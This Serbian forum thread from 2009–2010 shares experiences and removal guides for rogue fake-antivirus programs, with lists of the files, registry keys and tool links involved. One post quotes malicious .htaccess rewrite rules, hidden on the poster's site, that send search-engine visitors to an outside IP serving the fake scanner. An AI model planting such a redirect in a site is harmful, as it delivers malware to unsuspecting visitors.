_{[Ovu poruku je menjao cyberdjomla dana 16.01.2009. u 13:14 GMT+1]}

Evo iskustva sa prijateljicinim laptop-om:

Antivirus2009 nije dozvoljavao instaliranje bilo čega što može da ga ukloni, a ono što je puštao nije uspevalo da ga detektuje.
Probao sam na foru i uspelo je: promenio sam ime setup fajla Malwarebytes' Anti-Malware u xxx.exe i instalacija je prošla, ali nije hteo da ga startuje. Onda sam promenio i ime izvršnog fajla i uspeo je da se pokrene i ukloni napast...
Nakon istalacije Avast Free pustio sam ga da uradi boot time (ili kako se već zove) i našao je još neke zaostatke u restore fajlovima, a mislim da ću instalirati još nekoliko AV u trial modu i proveriti za svaki slučaj...

Virus je sebe postavio za AntiMalware-ov debugger.
Uradi ono sa skriptom gore samo promeni regedit.exe u ime tog fajla sto nece da se pokrene. Radice sigurno.
Javi sta je bilo. Pozz.

Posto ga nema u temama, ajd. da ga ubacimo.
Antivitus 2010 je slican svojim prethodnicima Antivirus 2009 i 2008. Izbacuje porukicu, pa kao nesto skenira, pa se ti uplasis pa kliknes na "Scan Now" pa ti on prebaci neki fajlic, pa ti to pokrenes pa te onda davi i nemas zivaca zato sto te udavi nekim porukama kako imas neki spyware i neko jos cudo...







Poruka surferima: "ISKULIRAJTE STRANICU", zatvorite je i obrisite je iz history da se nebi neko zeznuo pa je "Slucajno" pokrenuo sa vaseg kompa.
Updatujte svoje antiviruse firewall-ove itd.


Svoje fajlove smesta u Program Files "AV2010\AV2010.exe" i "AV2010\svchost.exe" a u system32 stvara "wingamma.exe", "IEDefender.dll" i "wingamma.exe"
Postavlja precice na "desktop" i u "start menu"


Upisuje registre u (oni koje sam nasao):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Gamma Display"
HKEY_CLASSES_ROOT\Interface\{7BC7565C-5062-43CE-8797-DC2C271140A9}
HKEY_CLASSES_ROOT\TypeLib\{705FD64B-2B7B-4856-9337-44CA1DA86849}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\AppID\IEDefender.DLL
HKEY_CLASSES_ROOT\AppID\{3C40236D-990B-443C-90E8-B1C07BCD4A68}
HKEY_CLASSES_ROOT\CLSID\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO.1

Moguce da sam nesto izostavio.

ZDRAVO!




_{[Ovu poruku je menjao cyberdjomla dana 18.01.2009. u 08:29 GMT+1]}

za sve ostalo tu je alt + f4

Naj-jednostavniji nacin da se oslobodite tih napasti je free program http://siri.urz.free.fr/Fix/SmitfraudFix.exe SmitfraudFix opsirnije o programu http://siri.urz.free.fr/Fix/SmitfraudFix.php ovde
Vrlo jednostavan program,mora se pokrenuti iz safe moda !
Mene je nekoliko puta spasao ponovne instalacije Windowsa

A pisano je o tome i u temi http://www.elitesecurity.org/t306716-0

Pre tri dana sam imao problem sa Antivirus 2010.

Nakon brisanja raznih gluposti sa racunara pomocu programa CCleaner, zatim skeniranjem uz pomoc KIS 2009 i SpyBot, nakon 3-4 puta nije se vise pojavljivao. Sva tri programa su bili poslednje verzije.

Verujem da je ovo resilo problem.

Licno imam problema vezano za ovaj lazni antivirus, ali sa druge strane...

Kada sam slucajno potrazio adresu drugara ,preko google-a, (kojem inace "ustupam" deo svog hostinga) naravno pojavi se i meni taj cuveni "Antivirus" kao pop-up....dalje je sve jasno.

E sad uzrok je to sto se u .htaccess fajl koje se obicno nalazi na istom mestu na serveru gde i Index.html promenjen, i to tako da tek kada ga otvorim (text) i skrolujem poprilicno "dole" (posto je na prvi pogled dokument prazan...)neko ubacio maliciozni kod sledece sadrzine:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87 .248.180.90/in.html?s=ipw2 [R,L]


Ja sam do sada vec nekoliko puta promenio (obrisao) ovaj kod, ostavljajuci prazan .htaccess dokument, promenuo svoju FTP sifru, nakon cega je jedno vreme sve ali sledece jutro opet stari kod....i redirekcija na "skeniranje" racunara....

Trenutno je ok, ali videcu ujutu...

Anti-virus-1 je relativno novi Rouge Antivirus program (lazni antivirus) slican programima kao sto su Antivirus 2010. i Antivirus 360.




================================
Uklanja se sa Malwarebytes` Antimalware.
================================



U HijackThis logu pojavljuju se sledeci fajlovi:



Na racunaru se pojavljuju sledeci fajlovi:



U Registry bazu upisuju se sledeci kljucevi:



Posle uklanjanja ovog Rouge-a sa MBAM-om, obavezno pogledajte da li su navedeni fajlovi ili regisry kljucevi slucajno ostali na racunaru.

_{[Ovu poruku je menjao Nemanja Živanović dana 31.03.2009. u 12:41 GMT+1]}

Spisak novih Rouge programa:

• ANG AntiVirus 09
• Virus Remover 2009
• WinCleaner 2009
• PrivacyGuardPro
• Total Virus Protection





Svi navedeni Rouge programi uklanjaju se sa Malwarebytes` Antimalware. Zahvaljujem se sajtu www.bleepingcomputer.com na korisnim informacijama.

Upustvo za uklanjanje Rouge programa alatom SmitFraudfix:

• Preuzmite SmitFraudfix na Desktop
• Restartujte racunar u Safe Mode
• Pokrenite program SmitFraudfix duplim klikom na ikonicu
• Pokrece se ekran Credits (pritisnite bilo koje dugme da nastavite)
• Sada se otvara izbor gde cete pritisnuti 2 (to ce oznaciti da proces ciscenja pocinje)
• Program ce poceti da cisti racunar kroz nekolio faza i kada zavrsi pokrenuce se Disk Cleanup program (da ocisti Temp, Temporary Internet Files...)
• Kad se ovaj proces zavrsi pojavice se ekran gde cete biti upitani: Do you want to clean the registry ? (y/n) - tu pritisnite Y pa Enter
• Kada se ovi procesi zavrse pojavice se crveni ekran sa porukom Computer will reboot now. Close all applications i pritisnute spacebar (razmaklicu na tastaturi) da potvrdte
• Racunar ce se tada restartovati u normalan rezim rada i automatski ce se pojaviti Notepad sa izvestajem.

Upustvo za uklanjanje "System Security" Rouge Antivirusa

Imao sam malo slobodnog vremena pa sam napravio video upustvo za uklanjanje System Security Rouge antivirusa. U principu, ovo upustvo vazi za uklanjanje vecine Rouge softvera:



Preuzimanje alata prikazanih u video tutorijalu:
• SmitFraudFix
• HijackThis

Bilo bi pozeljno da posle ovakvog uklanjanja racunar skenirate sa programom Malwarebytes` Antimalware. Sve nedoumice, pitanja i analizu loga mozete postaviti na forumu, otvaranjem nove teme.

Najveći je problem panika!!!
Jer se svi uspaniče kad ga zakače AV 360
Simulira pad sistema to jest plavljenje ekrana
na kom piše belim slovima:
Kompjuter je restartovao- pao pre negon što se naka komponenta ošteti!
Ali je to samo čuvar ekrana, nije ni u ludilu plavljenje ekrana tj. pad sistema!

On ide u više relacija u Sistem 32 u Program Files, Documents and Setings Aplikacije
u My Documents i na C:
Ako nemaš 2 OS instalirana
Restartuješ komp
Ubaciš bootabilan Partition Magic
Napraviš još jednu sistemsku particiju 10 GB
Restartuješ računar.
Ubaciš Bootabilan CD XP i instalirašna tu pripremljenu particiju
instaliraš Driver za grafičku i podršku za matičnu...
Kad si to uradio možeš da pređeš na stvar
Ideš na opciju pretraži na C: particiji i AV 360 i kučence ili Merlin će da pronađu sve gde se instalirao!!!
Imaćeš uvek jedan rezervni operativni sistem za takve slučajeve

PS. Prilikom instalacije odaberi ćirični widows na svim nivoima ako obraćuješ titlove
filmova da bi mogao da sačuvaš ćirilicu kao ANSI 8-o bitni text jer samo 8-o bitni text čitaju DivX player-i

Ja uvek imam 3 Operativna sistema
1. Win XP Latinični SP2 ili 3
2.Win XP Ćirilica SP2 ili 3
3.Win XP bez servis packa
jer jedino njegov Explrer vidi prazan DVD
4.LINUX

Meni se javio lazni Antivirus 2010, i ako sam imao "NOD32 v 2.7" updejtovan sa najnovijim definicijama i jos pride "AdMuncher" naravno bio IE7. Problem sam resio samo samo sa System Restore, to je bilo pre tri dana i jos se nije povratio.

_{[Ovu poruku je menjao Jagnjeca brigada dana 05.10.2009. u 14:06 GMT+1]}

ZAista ne razumem poriv da neko koristi v2,7

To je isto kao da nemaš antivirus na računaru.
Bolje stavi besplatnu Aviru

Nisam imao problema sa virusima godinama, 2.7 koristim jer ne opterecuje racunar (stariji racunar je u pitanju). Ne znam kako nije detektovao ovaj lazni virus, verovatno jer prepoznaje samo prave viruse :)

Politika svake AV kompanije je da stare verzije totalno zapostave i nateraju korisnike da plate i predju na nove verzije jer inace kako bi im uzeli kes.. tako da NOD 2.7 trenutno skoro nista ne radi po pitanju novih napasti..

Ok, da ne idemo u off topic .... preusmerio bih dalju diskuju na sledecu temu
http://www.elitesecurity.org/t...eba-ili-razbacivanje-resursima

Evo sta kaze Microsoft za lazni antivirs:

Important note about fake antivirus
Reports of rogue antivirus programs have become more prevalent lately. These are programs that generate misleading alerts and false detections of malcode in order to convince users to purchase the illegitimate security software. For example, programs such as Trojan:Win32/Antivirusxp and Program:Win32/FakeRednefed may display product names or logos in an apparent unlawful attempt to impersonate Microsoft products. These products may represent themselves as "Antivirus XP", "AntivirusXP 2008", "WinDefender 2008", "XP Antivirus", etc.
If you believe your machine is affected by malicious software or potentially unwanted software, you can use Windows Live safety scanner or another up-to-date scanning and removal tool to detect and remove malware or other potentially unwanted software from your computer. For more information on Microsoft security products, please visit our security products and services website. Additionally, you can get virus-related assistance at no additional charge from Microsoft in the United States and Canada via a toll-free support hot line, (866) PC-SAFETY (727-2338). For support outside the United States and Canada, please contact Microsoft Help and Support worldwide.

http://www.microsoft.com/windo...infamily/defender/default.mspx


oni preporucuju ovo:

http://onecare.live.com/site/en-us/default.htm

Zgodan mali programčić čije ime sve govori Remove Fake Antivirus 1.63



Download links (190KB):

Link I

Link II

md5: 5c960426d4ecf45beda3f1f0bbe33dd7




_{[Ovu poruku je menjao Zoran Rodic dana 15.04.2010. u 08:08 GMT+1]}

http://freeofvirus.blogspot.com/

Remove Fake Antivirus 1.65 is used to remove:

1. Security Tool
2. Antivirus 7
3. CleanUp Antivirus
4. Security Toolbar
5. Digital Protection
6. XP Smart Security 2010
7. Antivirus Suite
8. Vista Security Tool 2010
9. Total XP Security
10. Security Central
11. Security Antivirus
12. Total PC Defender 2010
13. Vista Antivirus Pro 2010
14. Your PC Protector
15. Vista Internet Security 2010
16. XP Guardian
17. Vista Guardian 2010
18. Antivirus Soft
19. XP Internet Security 2010
20. Antivir 2010
21. Live PC Care
22. Malware Defense
23. Internet Security 2010
24. Desktop Defender 2010
25. Antivirus Live
26. Personal Security
27. Cyber Security
28. Alpha Antivirus
29. Windows Enterprise Suite
30. Security Center
31. Control Center
32. Braviax
33. Windows Police Pro
34. Antivirus Pro 2010
35. PC Antispyware 2010
36. FraudTool.MalwareProtector.d
37. Winshield2009.com
38. Green AV
39. Windows Protection Suite
40. Total Security 2009
41. Windows System Suite
42. Antivirus BEST
43. System Security
44. Personal Antivirus
45. System Security 2009
46. Malware Doctor
47. Antivirus System Pro
48. WinPC Defender
49. Anti-Virus-1
50. Spyware Guard 2008
51. System Guard 2009
52. Antivirus 2009
53. Antivirus 2010
54. Antivirus Pro 2009
55. Antivirus 360
56. MS Antispyware 2009
57. IGuardPC or I Guard PC
58. Additional Guard



_{[Ovu poruku je menjao Goran Mijailovic dana 05.06.2010. u 18:57 GMT+1]}

Sysinternals Antivirus je novost, juce sam ga uklonio pomocu uputsva koje je objavljeno ovde: http://www.myantispyware.com/2...rnals-antivirus-removal-guide/

Step 1. Repair “running of .exe files”.

Click Start, Run. Type command and press Enter. Command console “black window” opens. Type notepad as shown below

Command console

Press Enter. Notepad opens. Copy all the text below into Notepad.


Save this as fix.reg to your Desktop (remember to select Save as file type: All files in Notepad.) Double Click fix.reg and click YES for confirm.
Reboot your computer.

If you can`t create fix.reg, then download fix.zip from here, http://www.myantispyware.com/wp-content/uploads/2010/05/fix.zip unzip it. Double Click fix.reg and click YES for confirm. Reboot your computer.

Step 2. Remove Sysinternals Antivirus associated malware.
Download MalwareBytes Anti-malware (MBAM). Once downloaded, close all programs and windows on your computer.

Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MalwareBytes Anti-malware onto your computer. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure a checkmark is placed next to “Update Malwarebytes’ Anti-Malware” and Launch “Malwarebytes’ Anti-Malware”. Then click Finish....

When the scan is finished a message box will appear that it has completed scanning successfully. Click OK. Now click “Show Results”. You will see a list of infected items similar as shown below.
Note: list of infected items may be different than what is shown in the image below.

Malwarebytes Anti-malware, list of infected items

Make sure all entries have a checkmark at their far left and click “Remove Selected” button to remove Sysinternals Antivirus. MalwareBytes Anti-malware will now remove all of associated Sysinternals Antivirus files and registry keys and add them to the programs’ quarantine. When MalwareBytes Anti-malware has finished removing the infection, a log will open in Notepad and you may be prompted to Restart.

Note 1: if you can not download, install, run or update Malwarebytes Anti-malware, then follow the steps: Malwarebytes won`t install, run or update – How to fix it.

Note 2: if you need help with the instructions, then post your questions in our Spyware Removal forum.

Note 3: your current antispyware and antivirus software let the infection through ? Then you may want to consider purchasing the FULL version of MalwareBytes Anti-malware to protect your computer in the future.
Sysinternals Antivirus creates the following files and folders

C:\Program Files\Sysinternals Antivirus
%UserProfile%\Start Menu\Programs\Sysinternals Antivirus
C:\Program Files\Sysinternals Antivirus\Sysinternals Antivirus.exe
C:\Program Files\adc_w32.dll
%UserProfile%\Start Menu\Programs\Sysinternals Antivirus\Sysinternals Antivirus.lnk
%UserProfile%\Desktop\Sysinternals Antivirus.lnk
C:\Program Files\alggui.exe
C:\Program Files\svchost.exe
C:\Program Files\skynet.dat
Sysinternals Antivirus creates the following registry keys and values

HKEY_CLASSES_ROOT\CLSID\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\adbupd
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ADBUPD
HKEY_USERS\.DEFAULT\Software\Sysinternals Antivirus
HKEY_CURRENT_USER\Software\Sysinternals Antivirus